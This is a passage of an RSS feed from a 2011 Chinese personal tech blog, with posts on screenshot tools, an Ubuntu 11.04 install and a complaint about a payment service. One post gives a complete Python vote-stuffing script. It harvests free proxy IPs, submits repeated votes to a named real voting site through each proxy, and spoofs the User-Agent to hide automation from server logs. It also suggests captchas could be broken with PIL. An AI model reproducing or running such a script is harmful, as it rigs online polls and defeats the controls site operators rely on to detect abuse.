			<content:encoded><![CDATA[<p>之前写了一篇<a href="http://www.willsonchen.com/archives/371">在Ubuntu Linux下的截图软件shutter</a>，shutter非常强大，但是对于添加自定义的文本比较麻烦，需要打开GIMP等图形编辑软件来处理。其实，可以使用浏览器的第三方扩展来截图，例如，“<a href="https://chrome.google.com/webstore/detail/alelhddbbhepgpmgidjdcjakblofbmce">截图快手</a>”就是一款非常优秀的浏览器扩展，可安装在Chrome、Friefox、Safari下。</p>
<p>截图快手可以很方便的在截取的区域中加入椭圆形、四方型的注释框，可以很方便加入注释文字，在完成批注或注释后，鼠标点击几下，就能将截图上传到截图网站，将返回的网址分享给朋友；还很方便将截图发送到twitter、facebook等社交网站。</p>
<p>截图快手官方网站： http://awesomescreenshot.com/<br />
<div id="attachment_376" class="wp-caption aligncenter" style="width: 373px"><a href="http://www.willsonchen.com/archives/375/awescreenshot" rel="attachment wp-att-376"><img src="http://www.willsonchen.com/wp-content/uploads/2011/05/awescreenshot-363x500.png" alt="awescreenshot 截图快手" title="awescreenshot 截图快手" width="363" height="500" class="size-medium wp-image-376" /></a><p class="wp-caption-text">awescreenshot 截图快手</p></div></p>
]]></content:encoded>
			<wfw:commentRss>http://www.willsonchen.com/archives/375/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ubuntu下的截图软件shutter</title>
		<link>http://www.willsonchen.com/archives/371</link>
		<comments>http://www.willsonchen.com/archives/371#comments</comments>
		<pubDate>Sat, 21 May 2011 04:44:17 +0000</pubDate>
		<dc:creator>willson</dc:creator>
				<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[shutter]]></category>

		<guid isPermaLink="false">http://www.willsonchen.com/?p=371</guid>
		<description><![CDATA[shutter是一款非常强大的截图软件，支持窗口、控件、菜单以及自定义的任意区域截图，截图后，可以做3D旋转、水印、灰度、镜面、撕裂等十多种特殊效果，支持截图后默认上传到站点的FTP空... ]]></description>
			<content:encoded><![CDATA[<p>shutter是一款非常强大的截图软件，支持窗口、控件、菜单以及自定义的任意区域截图，截图后，可以做3D旋转、水印、灰度、镜面、撕裂等十多种特殊效果，支持截图后默认上传到站点的FTP空间，以及打开图像编辑器等。</p>
<p>截图后，要将图片上传到Flickr，只需要安装Postr即可。</p>
<div id="attachment_372" class="wp-caption aligncenter" style="width: 510px"><a href="http://www.willsonchen.com/archives/371/%e9%80%90%e6%b8%90%e8%80%81%e5%8e%bb%e7%9a%84it%e8%8f%9c%e9%b8%9f-google-chrome-%e6%b5%8f%e8%a7%88%e5%99%a8_001" rel="attachment wp-att-372"><img src="http://www.willsonchen.com/wp-content/uploads/2011/05/逐渐老去的IT菜鸟-Google-Chrome-浏览器_001-500x350.png" alt="3D旋转效果" title="3D旋转效果" width="500" height="350" class="size-medium wp-image-372" /></a><p class="wp-caption-text">3D旋转效果</p></div>
<div id="attachment_373" class="wp-caption aligncenter" style="width: 510px"><a href="http://www.willsonchen.com/archives/371/%e9%80%90%e6%b8%90%e8%80%81%e5%8e%bb%e7%9a%84it%e8%8f%9c%e9%b8%9f-google-chrome-%e6%b5%8f%e8%a7%88%e5%99%a8_002" rel="attachment wp-att-373"><img src="http://www.willsonchen.com/wp-content/uploads/2011/05/逐渐老去的IT菜鸟-Google-Chrome-浏览器_002-500x350.png" alt="球面效果" title="球面效果" width="500" height="350" class="size-medium wp-image-373" /></a><p class="wp-caption-text">球面效果</p></div>
<div id="attachment_374" class="wp-caption aligncenter" style="width: 510px"><a href="http://www.willsonchen.com/archives/371/%e9%80%90%e6%b8%90%e8%80%81%e5%8e%bb%e7%9a%84it%e8%8f%9c%e9%b8%9f-google-chrome-%e6%b5%8f%e8%a7%88%e5%99%a8_003" rel="attachment wp-att-374"><img src="http://www.willsonchen.com/wp-content/uploads/2011/05/逐渐老去的IT菜鸟-Google-Chrome-浏览器_003-500x379.png" alt="相片效果" title="相片效果" width="500" height="379" class="size-medium wp-image-374" /></a><p class="wp-caption-text">相片效果</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.willsonchen.com/archives/371/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>用python写的一个简单刷票程序</title>
		<link>http://www.willsonchen.com/archives/367</link>
		<comments>http://www.willsonchen.com/archives/367#comments</comments>
		<pubDate>Sun, 15 May 2011 09:12:44 +0000</pubDate>
		<dc:creator>willson</dc:creator>
				<category><![CDATA[python]]></category>
		<category><![CDATA[刷票]]></category>

		<guid isPermaLink="false">http://www.willsonchen.com/?p=367</guid>
		<description><![CDATA[周五晚上花了一点时间用python写了一个刷互动力量投票系统的工具，原理很简单，先在代理网站上找代理IP，然后模拟http的方式，用urllib提交数据。这里有一些细节控制，修改一下user_agent，不... ]]></description>
			<content:encoded><![CDATA[<p>周五晚上花了一点时间用python写了一个刷互动力量投票系统的工具，原理很简单，先在代理网站上找代理IP，然后模拟http的方式，用urllib提交数据。这里有一些细节控制，修改一下user_agent，不然会在投票系统的服务器日志里显示“python/urllib”的user_agent信息。</p>
<p>我没有处理验证码这一块，因为我要刷的那个投票恰好没有验证码；就算有，那个验证码也是很有规律，用PIL或者自己写算法来分析也不是难事。</p>
<p>下面是整个刷票的程序，大约就20多行代码，非常简练。</p>

<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #808080; font-style: italic;">#!/usr/bin/python  </span>
<span style="color: #808080; font-style: italic;">#-*-coding:utf-8-*-  </span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">urllib</span>,<span style="color: #dc143c;">urllib2</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">re</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">sys</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">if</span> <span style="color: #008000;">len</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">sys</span>.<span style="color: black;">argv</span><span style="color: black;">&#41;</span> <span style="color: #66cc66;">!</span>= <span style="color: #ff4500;">3</span>:
    <span style="color: #dc143c;">sys</span>.<span style="color: black;">stderr</span>.<span style="color: black;">write</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">&quot;Usage: begin page num, end page num<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: black;">&#41;</span>
    <span style="color: #ff7700;font-weight:bold;">raise</span> <span style="color: #008000;">SystemExit</span><span style="color: black;">&#40;</span><span style="color: #ff4500;">1</span><span style="color: black;">&#41;</span>
start = <span style="color: #008000;">int</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">sys</span>.<span style="color: black;">argv</span><span style="color: black;">&#91;</span><span style="color: #ff4500;">1</span><span style="color: black;">&#93;</span><span style="color: black;">&#41;</span>
end = <span style="color: #008000;">int</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">sys</span>.<span style="color: black;">argv</span><span style="color: black;">&#91;</span><span style="color: #ff4500;">2</span><span style="color: black;">&#93;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">for</span> i <span style="color: #ff7700;font-weight:bold;">in</span> <span style="color: #008000;">range</span><span style="color: black;">&#40;</span>start,end<span style="color: black;">&#41;</span>:
    f = <span style="color: #dc143c;">urllib</span>.<span style="color: black;">urlopen</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">&quot;http://www.proxycn.com/html_proxy/http-&quot;</span>+<span style="color: #008000;">str</span><span style="color: black;">&#40;</span>i<span style="color: black;">&#41;</span>+<span style="color: #483d8b;">&quot;.html&quot;</span><span style="color: black;">&#41;</span>
    html = f.<span style="color: black;">read</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>
    proxies = <span style="color: #dc143c;">re</span>.<span style="color: black;">findall</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">&quot;clip<span style="color: #000099; font-weight: bold;">\(</span>'(.*?)'<span style="color: #000099; font-weight: bold;">\)</span>&quot;</span>,html,<span style="color: #dc143c;">re</span>.<span style="color: black;">S</span><span style="color: black;">&#41;</span>
    <span style="color: #ff7700;font-weight:bold;">for</span> n,proxy <span style="color: #ff7700;font-weight:bold;">in</span> <span style="color: #008000;">enumerate</span><span style="color: black;">&#40;</span>proxies<span style="color: black;">&#41;</span>:
        <span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #008000;">str</span><span style="color: black;">&#40;</span>n+<span style="color: #ff4500;">1</span><span style="color: black;">&#41;</span>+<span style="color: #483d8b;">&quot; &quot;</span>+proxy
        proxy_handler = <span style="color: #dc143c;">urllib2</span>.<span style="color: black;">ProxyHandler</span><span style="color: black;">&#40;</span><span style="color: black;">&#123;</span><span style="color: #483d8b;">'http'</span>: <span style="color: #483d8b;">'http://'</span>+proxy<span style="color: black;">&#125;</span><span style="color: black;">&#41;</span>       
        data = <span style="color: #dc143c;">urllib</span>.<span style="color: black;">urlencode</span><span style="color: black;">&#40;</span><span style="color: black;">&#123;</span><span style="color: #483d8b;">'vote_id'</span>:<span style="color: #ff4500;">12345</span>,<span style="color: #483d8b;">'question_id'</span>:<span style="color: #ff4500;">67890</span><span style="color: black;">&#125;</span><span style="color: black;">&#41;</span>
        request = <span style="color: #dc143c;">urllib2</span>.<span style="color: black;">Request</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">&quot;http://vote.activepower.net/script/user/get_vote_save.asp&quot;</span><span style="color: black;">&#41;</span>
        request.<span style="color: black;">add_header</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'User-Agent'</span>, <span style="color: #483d8b;">'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'</span><span style="color: black;">&#41;</span>
        opener = <span style="color: #dc143c;">urllib2</span>.<span style="color: black;">build_opener</span><span style="color: black;">&#40;</span>proxy_handler<span style="color: black;">&#41;</span>     
        <span style="color: #ff7700;font-weight:bold;">try</span>:
            ff = opener.<span style="color: #008000;">open</span><span style="color: black;">&#40;</span>request,data,<span style="color: #ff4500;">5</span><span style="color: black;">&#41;</span>
        <span style="color: #ff7700;font-weight:bold;">except</span>:
            <span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #483d8b;">&quot;time out&quot;</span></pre></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.willsonchen.com/archives/367/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ubuntu 11.04 Natty安装全过程截图</title>
		<link>http://www.willsonchen.com/archives/345</link>
		<comments>http://www.willsonchen.com/archives/345#comments</comments>
		<pubDate>Mon, 25 Apr 2011 01:43:21 +0000</pubDate>
		<dc:creator>willson</dc:creator>
				<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[安装]]></category>
		<category><![CDATA[ubuntu 11.04]]></category>

		<guid isPermaLink="false">http://www.willsonchen.com/?p=345</guid>
		<description><![CDATA[... ]]></description>
			<content:encoded><![CDATA[
<a href='http://www.willsonchen.com/archives/345/1-2' title='1'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/1-150x150.png" class="attachment-thumbnail" alt="1" title="1" /></a>
<a href='http://www.willsonchen.com/archives/345/2-2' title='2'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/2-150x150.png" class="attachment-thumbnail" alt="2" title="2" /></a>
<a href='http://www.willsonchen.com/archives/345/3-2' title='3'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/3-150x150.png" class="attachment-thumbnail" alt="3" title="3" /></a>
<a href='http://www.willsonchen.com/archives/345/4-3' title='4'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/4-150x150.png" class="attachment-thumbnail" alt="4" title="4" /></a>
<a href='http://www.willsonchen.com/archives/345/5-3' title='5'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/5-150x150.png" class="attachment-thumbnail" alt="5" title="5" /></a>
<a href='http://www.willsonchen.com/archives/345/6-3' title='6'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/6-150x150.png" class="attachment-thumbnail" alt="6" title="6" /></a>
<a href='http://www.willsonchen.com/archives/345/7-2' title='7'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/7-150x150.png" class="attachment-thumbnail" alt="7" title="7" /></a>
<a href='http://www.willsonchen.com/archives/345/8-2' title='8'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/8-150x150.png" class="attachment-thumbnail" alt="8" title="8" /></a>
<a href='http://www.willsonchen.com/archives/345/9-2' title='9'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/9-150x150.png" class="attachment-thumbnail" alt="9" title="9" /></a>
<a href='http://www.willsonchen.com/archives/345/10-2' title='10'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/10-150x150.png" class="attachment-thumbnail" alt="10" title="10" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/11' title='11'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/11-150x150.png" class="attachment-thumbnail" alt="11" title="11" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/12' title='12'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/12-150x150.png" class="attachment-thumbnail" alt="12" title="12" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/13' title='13'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/13-150x150.png" class="attachment-thumbnail" alt="13" title="13" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/14' title='14'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/14-150x150.png" class="attachment-thumbnail" alt="14" title="14" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/15' title='15'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/15-150x150.png" class="attachment-thumbnail" alt="15" title="15" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/16' title='16'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/16-150x150.png" class="attachment-thumbnail" alt="16" title="16" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/17' title='17'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/17-150x150.png" class="attachment-thumbnail" alt="17" title="17" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/18' title='18'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/18-150x150.png" class="attachment-thumbnail" alt="18" title="18" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/19' title='19'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/19-150x150.png" class="attachment-thumbnail" alt="19" title="19" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/20' title='20'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/20-150x150.png" class="attachment-thumbnail" alt="20" title="20" /></a>
<a href='http://www.willsonchen.com/archives/345/attachment/21' title='21'><img width="150" height="150" src="http://www.willsonchen.com/wp-content/uploads/2011/04/21-150x150.png" class="attachment-thumbnail" alt="21" title="21" /></a>

]]></content:encoded>
			<wfw:commentRss>http://www.willsonchen.com/archives/345/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>差劲的快钱</title>
		<link>http://www.willsonchen.com/archives/343</link>
		<comments>http://www.willsonchen.com/archives/343#comments</comments>
		<pubDate>Fri, 01 Apr 2011 02:35:52 +0000</pubDate>
		<dc:creator>willson</dc:creator>
				<category><![CDATA[生活]]></category>
		<category><![CDATA[快钱]]></category>

		<guid isPermaLink="false">http://www.willsonchen.com/?p=343</guid>
		<description><![CDATA[这是我第一次使用快钱，因为有一笔款急需转帐。我注册登录后，在左侧菜单点击&#8221;我要付款&#8221;》&#8221;付款到银行帐号&#8221;，提交信息后系统说余额不足，需要充值，于是，我点击&#8221;... ]]></description>
			<content:encoded><![CDATA[<p>这是我第一次使用快钱，因为有一笔款急需转帐。我注册登录后，在左侧菜单点击&#8221;我要付款&#8221;》&#8221;付款到银行帐号&#8221;，提交信息后系统说余额不足，需要充值，于是，我点击&#8221;账户管理&#8221;》&#8221;充值&#8221;，从我的信用卡里将款打到快钱（我的借记卡没有网上银行功能），再次在&#8221;付款到银行帐号&#8221;里提交，系统提示操作成功，告知我在3个工作日内可以到帐。</p>
<p>两天后，收到快钱风控部门的邮件，说可能涉及套现，转帐不成功。但是从开始到结束我都没有看到任何关于套现的说明，尤其在&#8221;付款到银行帐号&#8221;页面，没有任何的文字说明。最后在充值页面看到一行关于&#8221;信用卡套现收取1%手续费&#8221;的文字，而这行文字并没有直接告知用户哪些行为是不允许的。</p>
<p>我认为在整个过程中，我没有做错，唯一的错误就是没有将快钱网站的每个页面都点击进去阅读10回；如果快钱在&#8221;付款到银行帐号&#8221;页面有说明，或者能检测到信用卡不能支付，又或者在提交信息时有提醒，那么都不会有这样的问题；快钱由于系统设计问题，提示严重不足，造成我延误了多天时间，还损失1%的手续费，这些损失，请问快钱怎么处理？还是说，这是快钱故意设陷收取手续费？</p>
<p>想不到我在快钱的第一次体验如此差劲，这是我的第一次使用，也是最后一次。<br />
<div id="attachment_344" class="wp-caption aligncenter" style="width: 510px"><a href="http://www.willsonchen.com/archives/343/fukuan" rel="attachment wp-att-344"><img src="http://www.willsonchen.com/wp-content/uploads/2011/04/fukuan-500x375.png" alt="付款到银行帐号没有任何提示" title="付款到银行帐号没有任何提示" width="500" height="375" class="size-medium wp-image-344" /></a><p class="wp-caption-text">付款到银行帐号没有任何提示</p></div></p>
]]></content:encoded>
			<wfw:commentRss>http://www.willsonchen.com/archives/343/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

